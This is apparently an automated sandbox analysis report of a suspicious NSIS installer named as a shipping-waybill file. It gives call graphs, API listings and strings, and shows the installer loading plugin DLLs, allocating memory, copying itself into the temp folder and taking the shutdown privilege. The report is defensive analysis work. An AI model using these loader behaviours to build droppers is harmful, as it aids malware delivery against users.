SendMessageW 4503->4505 4504->4493 4505->4504 4508 401390 4506->4508 4507 4013fe 4507->4493 4508->4507 4509 4013cb MulDiv SendMessageW 4508->4509 4509->4508 4511 403923 4510->4511 4512 403928 FreeLibrary GlobalFree 4511->4512 4513 4038ed 4511->4513 4512->4512 4512->4513 4513->4427 5324 739618d9 5325 739618fc 5324->5325 5326 73961943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5325->5326 5327 73961931 GlobalFree 5325->5327 5328 73961272 2 API calls 5326->5328 5327->5326 5329 73961ace GlobalFree GlobalFree 5328->5329 5330 40190f 5331 402c41 17 API calls 5330->5331 5332 401916 5331->5332 5333 405920 MessageBoxIndirectW 5332->5333 5334 40191f 5333->5334 5335 401491 5336 405322 24 API calls 5335->5336 5337 401498 5336->5337 5338 401d14 5339 402c1f 17 API calls 5338->5339 5340 401d1b 5339->5340 5341 402c1f 17 API calls 5340->5341 5342 401d27 GetDlgItem 5341->5342 5343 402592 5342->5343 5344 405296 5345 4052a6 5344->5345 5346 4052ba 5344->5346 5348 405303 5345->5348 5349 4052ac 5345->5349 5347 4052c2 IsWindowVisible 5346->5347 5355 4052d9 5346->5355 5347->5348 5350 4052cf 5347->5350 5351 405308 CallWindowProcW 5348->5351 5352 40427d SendMessageW 5349->5352 5357 404bec SendMessageW 5350->5357 5353 4052b6 5351->5353 5352->5353 5355->5351 5362 404c6c 5355->5362 5358 404c4b SendMessageW 5357->5358 5359 404c0f GetMessagePos ScreenToClient SendMessageW 5357->5359 5360 404c43 5358->5360 5359->5360 5361 404c48 5359->5361 5360->5355 5361->5358 5371 4062ba lstrcpynW 5362->5371 5364 404c7f 5372 406201 wsprintfW 5364->5372 5366 404c89 5367 40140b 2 API calls 5366->5367 5368 404c92 5367->5368 5373 4062ba lstrcpynW 5368->5373 5370 404c99 5370->5348 5371->5364 5372->5366 5373->5370 5374 402598 5375 4025c7 5374->5375 5376 4025ac 5374->5376 5378 4025fb 5375->5378 5379 4025cc 5375->5379 5377 402c1f 17 API calls 5376->5377 5385 4025b3 5377->5385 5381 402c41 17 API calls 5378->5381 5380 402c41 17 API calls 5379->5380 5382 4025d3 WideCharToMultiByte lstrlenA 5380->5382 5383 402602 lstrlenW 5381->5383 5382->5385 5383->5385 5384 402645 5385->5384 5387 405e91 5 API calls 5385->5387 5388 40262f 5385->5388 5386 405e62 WriteFile 5386->5384 5387->5388 5388->5384 5388->5386 5389 404c9e GetDlgItem GetDlgItem 5390 404cf0 7 API calls 5389->5390 5393 404f09 5389->5393 5391 404d93 DeleteObject 5390->5391 5392 404d86 SendMessageW 5390->5392 5394 404d9c 5391->5394 5392->5391 5404 404bec 5 API calls 5393->5404 5408 404fed 5393->5408 5423 404f7a 5393->5423 5395 404dd3 5394->5395 5398 4062dc 17 API calls 5394->5398 5396 404231 18 API calls 5395->5396 5399 404de7 5396->5399 5397 405099 5401 4050a3 SendMessageW 5397->5401 5402 4050ab 5397->5402 5403 404db5 SendMessageW SendMessageW 5398->5403 5405 404231 18 API calls 5399->5405 5400 404efc 5407 404298 8 API calls 5400->5407 5401->5402 5410 4050c4 5402->5410 5411 4050bd ImageList_Destroy 5402->5411 5418 4050d4 5402->5418 5403->5394 5404->5423 5424 404df5 5405->5424 5406 405046 SendMessageW 5406->5400 5413 40505b SendMessageW 5406->5413 5414 40528f 5407->5414 5408->5397 5408->5400 5408->5406 5409 404fdf SendMessageW 5409->5408 5415 4050cd GlobalFree 5410->5415 5410->5418 5411->5410 5412 405243 5412->5400 5419 405255 ShowWindow GetDlgItem ShowWindow 5412->5419 5417 40506e 5413->5417 5415->5418 5416 404eca GetWindowLongW SetWindowLongW 5420 404ee3 5416->5420 5428 40507f SendMessageW 5417->5428 5418->5412 5432 404c6c 4 API calls 5418->5432 5436 40510f 5418->5436 5419->5400 5421 404f01 5420->5421 5422 404ee9 ShowWindow 5420->5422 5441 404266 SendMessageW 5421->5441 5440 404266 SendMessageW 5422->5440 5423->5408 5423->5409 5424->5416 5427 404e45 SendMessageW 5424->5427 5429 404ec4 5424->5429 5430 404e81 SendMessageW 5424->5430 5431 404e92 SendMessageW 5424->5431 5427->5424 5428->5397 5429->5416 5429->5420 5430->5424 5431->5424 5432->5436 5433 405219 InvalidateRect 5433->5412 5434 40522f 5433->5434 5442 404ba7 5434->5442 5435 40513d SendMessageW 5439 405153 5435->5439 5436->5435 5436->5439 5438 4051c7 SendMessageW SendMessageW 5438->5439 5439->5433 5439->5438 5440->5400 5441->5393 5445 404ade 5442->5445 5444 404bbc 5444->5412 5446 404af7 5445->5446 5447 4062dc 17 API calls 5446->5447 5448 404b5b 5447->5448 5449 4062dc 17 API calls 5448->5449 5450 404b66 5449->5450 5451 4062dc 17 API calls 5450->5451 5452 404b7c lstrlenW wsprintfW SetDlgItemTextW 5451->5452 5452->5444 5453 40149e 5454 4022f7 5453->5454 5455 4014ac PostQuitMessage 5453->5455 5455->5454 4629 401c1f 4630 402c1f 17 API calls 4629->4630 4631 401c26 4630->4631 4632 402c1f 17 API calls 4631->4632 4633 401c33 4632->4633 4634 401c48 4633->4634 4635 402c41 17 API calls 4633->4635 4636 401c58 4634->4636 4639 402c41 17 API calls 4634->4639 4635->4634 4637 401c63 4636->4637 4638 401caf 4636->4638 4640 402c1f 17 API calls 4637->4640 4641 402c41 17 API calls 4638->4641 4639->4636 4642 401c68 4640->4642 4643 401cb4 4641->4643 4644 402c1f 17 API calls 4642->4644 4645 402c41 17 API calls 4643->4645 4646 401c74 4644->4646 4647 401cbd FindWindowExW 4645->4647 4648 401c81 SendMessageTimeoutW 4646->4648 4649 401c9f SendMessageW 4646->4649 4650 401cdf 4647->4650 4648->4650 4649->4650 5456 402aa0 SendMessageW 5457 402ac5 5456->5457 5458 402aba InvalidateRect 5456->5458 5458->5457 5459 402821 5460 402827 5459->5460 5461 40282f FindClose 5460->5461 5462 402ac5 5460->5462 5461->5462 5463 4043a1 lstrlenW 5464 4043c0 5463->5464 5465 4043c2 WideCharToMultiByte 5463->5465 5464->5465 5466 404722 5467 40474e 5466->5467 5468 40475f 5466->5468 5527 405904 GetDlgItemTextW 5467->5527 5470 40476b GetDlgItem 5468->5470 5476 4047ca 5468->5476 5472 40477f 5470->5472 5471 404759 5474 40654e 5 API calls 5471->5474 5478 404793 SetWindowTextW 5472->5478 5483 405c3a 4 API calls 5472->5483 5473 4048ae 5475 404a5d 5473->5475 5529 405904 GetDlgItemTextW 5473->5529 5474->5468 5482 404298 8 API calls 5475->5482 5476->5473 5476->5475 5479 4062dc 17 API calls 5476->5479 5481 404231 18 API calls 5478->5481 5484 40483e SHBrowseForFolderW 5479->5484 5480 4048de 5485 405c97 18 API calls 5480->5485 5486 4047af 5481->5486 5487 404a71 5482->5487 5488 404789 5483->5488 5484->5473 5489 404856 CoTaskMemFree 5484->5489 5490 4048e4 5485->5490 5491 404231 18 API calls 5486->5491 5488->5478 5492 405b8f 3 API calls 5488->5492 5493 405b8f 3 API calls 5489->5493 5530 4062ba lstrcpynW 5490->5530 5494 4047bd 5491->5494 5492->5478 5495 404863 5493->5495 5528 404266 SendMessageW 5494->5528 5498 40489a SetDlgItemTextW 5495->5498 5503 4062dc 17 API calls 5495->5503 5498->5473 5499 4047c3 5501 406694 5 API calls 5499->5501 5500 4048fb 5502 406694 5 API calls 5500->5502 5501->5476 5510 404902 5502->5510 5504 404882 lstrcmpiW 5503->5504 5504->5498 5507 404893 lstrcatW 5504->5507 5505 404943 5531 4062ba lstrcpynW 5505->5531 5507->5498 5508 40494a 5509 405c3a 4 API calls 5508->5509 5511 404950 GetDiskFreeSpaceW 5509->5511 5510->5505 5513 405bdb 2 API calls 5510->5513 5515 40499b 5510->5515 5514 404974 MulDiv 5511->5514 5511->5515 5513->5510 5514->5515 5516 404a0c 5515->5516 5517 404ba7 20 API calls 5515->5517 5518 404a2f 5516->5518 5520 40140b 2 API calls 5516->5520 5519 4049f9 5517->5519 5532 404253 KiUserCallbackDispatcher 5518->5532 5522 404a0e SetDlgItemTextW 5519->5522 5523 4049fe 5519->5523 5520->5518 5522->5516 5525 404ade 20 API calls 5523->5525 5524 404a4b 5524->5475 5526 40467b SendMessageW 5524->5526 5525->5516 5526->5475 5527->5471 5528->5499 5529->5480 5530->5500 5531->5508 5532->5524 4701 4015a3 4702 402c41 17 API calls 4701->4702 4703 4015aa SetFileAttributesW 4702->4703 4704 4015bc 4703->4704 5533 739622fd 5534 73962367 5533->5534 5535 73962372 GlobalAlloc 5534->5535 5536 73962391 5534->5536 5535->5534 5537 4028ad 5538 402c41 17 API calls 5537->5538 5540 4028bb 5538->5540 5539 4028d1 5542 405d8b 2 API calls 5539->5542 5540->5539 5541 402c41 17 API calls 5540->5541 5541->5539 5543 4028d7 5542->5543 5565 405db0 GetFileAttributesW CreateFileW 5543->5565 5545 4028e4 5546 4028f0 GlobalAlloc 5545->5546 5547 402987 5545->5547 5550 402909 5546->5550 5551 40297e CloseHandle 5546->5551 5548 4029a2 5547->5548 5549 40298f DeleteFileW 5547->5549 5549->5548 5566 403347 SetFilePointer 5550->5566 5551->5547 5553 40290f 5554 403331 ReadFile 5553->5554 5555 402918 GlobalAlloc 5554->5555 5556 402928 5555->5556 5557 40295c 5555->5557 5558 403116 31 API calls 5556->5558 5559 405e62 WriteFile 5557->5559 5564 402935 5558->5564 5560 402968 GlobalFree 5559->5560 5561 403116 31 API calls 5560->5561 5563 40297b 5561->5563 5562 402953 GlobalFree 5562->5557 5563->5551 5564->5562 5565->5545 5566->5553 5567 401a30 5568 402c41 17 API calls 5567->5568 5569 401a39 ExpandEnvironmentStringsW 5568->5569 5570 401a4d 5569->5570 5572 401a60 5569->5572 5571 401a52 lstrcmpW 5570->5571 5570->5572 5571->5572 4792 402032 4793 402044 4792->4793 4794 4020f6 4792->4794 4795 402c41 17 API calls 4793->4795 4796 401423 24 API calls 4794->4796 4797 40204b 4795->4797 4803 402250 4796->4803 4798 402c41 17 API calls 4797->4798 4799 402054 4798->4799 4800 40206a LoadLibraryExW 4799->4800 4801 40205c GetModuleHandleW 4799->4801 4800->4794 4802 40207b 4800->4802 4801->4800 4801->4802 4815 406703 WideCharToMultiByte 4802->4815 4806 4020c5 4808 405322 24 API calls 4806->4808 4807 40208c 4809 402094 4807->4809 4810 4020ab 4807->4810 4811 40209c 4808->4811 4812 401423 24 API calls 4809->4812 4818 73961777 4810->4818 4811->4803 4813 4020e8 FreeLibrary 4811->4813 4812->4811 4813->4803 4816 40672d GetProcAddress 4815->4816 4817 402086 4815->4817 4816->4817 4817->4806 4817->4807 4819 739617aa 4818->4819 4860 73961b5f 4819->4860 4821 739617b1 4822 739618d6 4821->4822 4823 739617c2 4821->4823 4824 739617c9 4821->4824 4822->4811 4910 73962352 4823->4910 4894 73962394 4824->4894 4829 739617ee 4830 7396180f 4829->4830 4831 7396182d 4829->4831 4923 73962569 4830->4923 4836 73961833 4831->4836 4837 7396187e 4831->4837 4832 739617df 4835 739617e5 4832->4835 4840 739617f0 4832->4840 4833 739617f8 4833->4829 4920 73962d37 4833->4920 4835->4829 4904 73962aac 4835->4904 4942 739615c6 4836->4942 4838 73962569 10 API calls 4837->4838 4844 7396186f 4838->4844 4839 73961815 4934 739615b4 4839->4934 4914 73962724 4840->4914 4851 739618c5 4844->4851 4948 7396252c 4844->4948 4849 739617f6 4849->4829 4850 73962569 10 API calls 4850->4844 4851->4822 4855 739618cf GlobalFree 4851->4855 4855->4822 4857 739618b1 4857->4851 4952 7396153d wsprintfW 4857->4952 4858 739618aa FreeLibrary 4858->4857 4955 7396121b GlobalAlloc 4860->4955 4862 73961b83 4956 7396121b GlobalAlloc 4862->4956 4864 73961da9 GlobalFree GlobalFree GlobalFree 4865 73961dc6 4864->4865 4880 73961e10 4864->4880 4866 73962192 4865->4866 4874 73961ddb 4865->4874 4865->4880 4868 739621b4 GetModuleHandleW 4866->4868 4866->4880 4867 73961c64 GlobalAlloc 4889 73961b8e 4867->4889 4871 739621c5 LoadLibraryW 4868->4871 4872 739621da 4868->4872 4869 73961caf lstrcpyW 4873 73961cb9 lstrcpyW 4869->4873 4870 73961ccd GlobalFree 4870->4889 4871->4872 4871->4880 4963 7396161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4872->4963 4873->4889 4874->4880 4959 7396122c 4874->4959 4876 7396222c 4878 73962239 lstrlenW 4876->4878 4876->4880 4964 7396161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4878->4964 4879 73962064 4962 7396121b GlobalAlloc 4879->4962 4880->4821 4881 739621ec 4881->4876 4892 73962216 GetProcAddress 4881->4892 4882 739620ec 4882->4880 4887 73962134 lstrcpyW 4882->4887 4885 73961d0b 4885->4889 4957 7396158f GlobalSize GlobalAlloc 4885->4957 4886 73961fa5 GlobalFree 4886->4889 4887->4880 4888 73962253 4888->4880 4889->4864 4889->4867 4889->4869 4889->4870 4889->4873 4889->4879 4889->4880 4889->4882 4889->4885 4889->4886 4890 7396122c 2 API calls 4889->4890 4890->4889 4892->4876 4893 7396206d 4893->4821 4901 739623ac 4894->4901 4895 7396122c GlobalAlloc lstrcpynW 4895->4901 4897 739624d5 GlobalFree 4898 739617cf 4897->4898 4897->4901 4898->4829 4898->4832 4898->4833 4899 73962454 GlobalAlloc WideCharToMultiByte 4899->4897 4900 7396247f GlobalAlloc CLSIDFromString 4900->4897 4901->4895 4901->4897 4901->4899 4901->4900 4903 7396249e 4901->4903 4966 739612ba 4901->4966 4903->4897 4970 739626b8 4903->4970 4905 73962abe 4904->4905 4906 73962b63 VirtualAlloc 4905->4906 4909 73962b81 4906->4909 4908 73962c4d 4908->4829 4973 73962a56 4909->4973 4911 73962367 4910->4911 4912 73962372 GlobalAlloc 4911->4912 4913 739617c8 4911->4913 4912->4911 4913->4824 4918 73962754 4914->4918 4915 73962802 4917 73962808 GlobalSize 4915->4917 4919 73962812 4915->4919 4916 739627ef GlobalAlloc 4916->4919 4917->4919 4918->4915 4918->4916 4919->4849 4921 73962d42 4920->4921 4922 73962d82 GlobalFree 4921->4922 4977 7396121b GlobalAlloc 4923->4977 4925 7396260e StringFromGUID2 4931 73962573 4925->4931 4926 7396261f lstrcpynW 4926->4931 4927 739625ec MultiByteToWideChar 4927->4931 4928 73962632 wsprintfW 4928->4931 4929 73962656 GlobalFree 4929->4931 4930 7396268b GlobalFree 4930->4839 4931->4925 4931->4926 4931->4927 4931->4928 4931->4929 4931->4930 4932 73961272 2 API calls 4931->4932 4978 739612e1 4931->4978 4932->4931 4982 7396121b GlobalAlloc 4934->4982 4936 739615b9 4937 739615c6 2 API calls 4936->4937 4938 739615c3 4937->4938 4939 73961272 4938->4939 4940 739612b5 GlobalFree 4939->4940 4941 7396127b GlobalAlloc lstrcpynW 4939->4941 4940->4844 4941->4940 4943 739615d2 wsprintfW 4942->4943 4944 739615ff lstrcpyW 4942->4944 4947 73961618 4943->4947 4944->4947 4947->4850 4949 7396253a 4948->4949 4951 73961891 4948->4951 4950 73962556 GlobalFree 4949->4950 4949->4951 4950->4949 4951->4857 4951->4858 4953 73961272 2 API calls 4952->4953 4954 7396155e 4953->4954 4954->4851 4955->4862 4956->4889 4958 739615ad 4957->4958 4958->4885 4965 7396121b GlobalAlloc 4959->4965 4961 7396123b lstrcpynW 4961->4880 4962->4893 4963->4881 4964->4888 4965->4961 4967 739612c1 4966->4967 4968 7396122c 2 API calls 4967->4968 4969 739612df 4968->4969 4969->4901 4971 739626c6 VirtualAlloc 4970->4971 4972 7396271c 4970->4972 4971->4972 4972->4903 4974 73962a61 4973->4974 4975 73962a66 GetLastError 4974->4975 4976 73962a71 4974->4976 4975->4976 4976->4908 4977->4931 4979 7396130c 4978->4979 4980 739612ea 4978->4980 4979->4931 4980->4979 4981 739612f0 lstrcpyW 4980->4981 4981->4979 4982->4936 4988 401735 4989 402c41 17 API calls 4988->4989 4990 40173c SearchPathW 4989->4990 4991 4029e6 4990->4991 4992 401757 4990->4992 4992->4991 4994 4062ba lstrcpynW 4992->4994 4994->4991 5578 402a35 5579 402c1f 17 API calls 5578->5579 5580 402a3b 5579->5580 5581 40288b 5580->5581 5582 402a72 5580->5582 5584 402a4d 5580->5584 5582->5581 5583 4062dc 17 API calls 5582->5583 5583->5581 5584->5581 5586 406201 wsprintfW 5584->5586 5586->5581 5587 739610e1 5596 73961111 5587->5596 5588 739611d8 GlobalFree 5589 739612ba 2 API calls 5589->5596 5590 739611d3 5590->5588 5591 739611f8 GlobalFree 5591->5596 5592 73961272 2 API calls 5595 739611c4 GlobalFree 5592->5595 5593 73961164 GlobalAlloc 5593->5596 5594 739612e1 lstrcpyW 5594->5596 5595->5596 5596->5588 5596->5589 5596->5590 5596->5591 5596->5592 5596->5593 5596->5594 5596->5595 5597 4014b8 5598 4014be 5597->5598 5599 401389 2 API calls 5598->5599 5600 4014c6 5599->5600 5601 401db9 GetDC 5602 402c1f 17 API calls 5601->5602 5603 401dcb GetDeviceCaps MulDiv ReleaseDC 5602->5603 5604 402c1f 17 API calls 5603->5604 5605 401dfc 5604->5605 5606 4062dc 17 API calls 5605->5606 5607 401e39 CreateFontIndirectW 5606->5607 5608 402592 5607->5608 5609 40283b 5610 402843 5609->5610 5611 402847 FindNextFileW 5610->5611 5612 402859 5610->5612 5611->5612 5613 4029e6 5612->5613 5615 4062ba lstrcpynW 5612->5615 5615->5613 5616 7396166d 5617 73961516 GlobalFree 5616->5617 5619 73961685 5617->5619 5618 739616cb GlobalFree 5619->5618 5620 739616a0 5619->5620 5621 739616b7 VirtualFree 5619->5621 5620->5618 5621->5618

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 8 4033d8 1->8 3 4033e4-4033f8 call 406624 lstrlenA 2->3 9 4033fa-403416 call 406694 * 3 3->9 8->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 22 403420 17->22 22->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 31 4034b8-4034bd 28->31 32 4034bf-4034c3 28->32 36 403633-40364d DeleteFileW call 402edd 29->36 37 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->37 31->31 31->32 34 4034c5-4034c9 32->34 35 4034ca-4034ce 32->35 34->35 38 4034d4-4034da 35->38 39 40358d-40359a call 405bbc 35->39 57 403653-403659 36->57 58 4036fe-40370e call 4038d0 OleUninitialize 36->58 37->36 54 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 37->54 43 4034f5-40352e 38->43 44 4034dc-4034e4 38->44 55 40359c-40359d 39->55 56 40359e-4035a4 39->56 45 403530-403535 43->45 46 40354b-403585 43->46 50 4034e6-4034e9 44->50 51 4034eb 44->51 45->46 52 403537-40353f 45->52 46->39 53 403587-40358b 46->53 50->43 50->51 51->43 60 403541-403544 52->60 61 403546 52->61 53->39 62 4035ac-4035ba call 4062ba 53->62 54->36 54->58 55->56 56->28 64 4035aa 56->64 65 4036ee-4036f5 call 4039aa 57->65 66 40365f-40366a call 405bbc 57->66 74 403834-40383a 58->74 75 403714-403724 call 405920 ExitProcess 58->75 60->46 60->61 61->46 69 4035bf 62->69 64->69 73 4036fa 65->73 77 4036b8-4036c2 66->77 78 40366c-4036a1 66->78 69->29 73->58 80 4038b8-4038c0 74->80 81 40383c-403852 GetCurrentProcess OpenProcessToken 74->81 85 4036c4-4036d2 call 405c97 77->85 86 40372a-40373e call 40588b lstrcatW 77->86 82 4036a3-4036a7 78->82 83 4038c2 80->83 84 4038c6-4038ca ExitProcess 80->84 88 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403888-403896 call 406694 81->89 90 4036b0-4036b4 82->90 91 4036a9-4036ae 82->91 83->84 85->58 99 4036d4-4036ea call 4062ba * 2 85->99 100 403740-403746 lstrcatW 86->100 101 40374b-403765 lstrcatW lstrcmpiW 86->101 88->89 102 4038a4-4038af ExitWindowsEx 89->102 103 403898-4038a2 89->103 90->82 95 4036b6 90->95 91->90 91->95 95->77 99->65 100->101 101->58 106 403767-40376a 101->106 102->80 104 4038b1-4038b3 call 40140b 102->104 103->102 103->104 104->80 110 403773 call 40586e 106->110 111 40376c-403771 call 4057f1 106->111 115 403778-403786 SetCurrentDirectoryW 110->115 111->115 118 403793-4037bc call 4062ba 115->118 119 403788-40378e call 4062ba 115->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 128 403828-40382f call 406080 126->128 127->126 129 4037f1-403811 call 406080 call 4062dc call 4058a3 127->129 128->58 129->126 138 403813-40381a CloseHandle 129->138 138->126
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 004033B2
                                                                    • GetVersion.KERNEL32 ref: 004033B8
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                    • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                    • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                    • GetCommandLineW.KERNEL32(Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000020,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                      • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                      • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                                    • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                    • ExitProcess.KERNEL32 ref: 00403724
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                    • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Awb 4586109146.bat.exe,0042AA08,?,?,00000006,00000008,0000000A), ref: 004037E7
                                                                    • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                    • ExitProcess.KERNEL32 ref: 004038CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sillinesses$C:\Users\user\AppData\Local\sillinesses$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb 4586109146.bat.exe$Error launching installer$Footballer Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 3441113951-800099343
                                                                    • Opcode ID: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                                                    • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                    • Opcode Fuzzy Hash: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                                                    • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 139 405461-40547c 140 405482-405549 GetDlgItem * 3 call 404266 call 404bbf GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40560b-405612 139->141 159 405567-40556a 140->159 160 40554b-405565 SendMessageW * 2 140->160 143 405614-405636 GetDlgItem CreateThread CloseHandle 141->143 144 40563c-405649 141->144 143->144 145 405667-405671 144->145 146 40564b-405651 144->146 150 405673-405679 145->150 151 4056c7-4056cb 145->151 148 405653-405662 ShowWindow * 2 call 404266 146->148 149 40568c-405695 call 404298 146->149 148->145 163 40569a-40569e 149->163 155 4056a1-4056b1 ShowWindow 150->155 156 40567b-405687 call 40420a 150->156 151->149 153 4056cd-4056d3 151->153 153->149 161 4056d5-4056e8 SendMessageW 153->161 164 4056c1-4056c2 call 40420a 155->164 165 4056b3-4056bc call 405322 155->165 156->149 166 40557a-405591 call 404231 159->166 167 40556c-405578 SendMessageW 159->167 160->159 168 4057ea-4057ec 161->168 169 4056ee-405719 CreatePopupMenu call 4062dc AppendMenuW 161->169 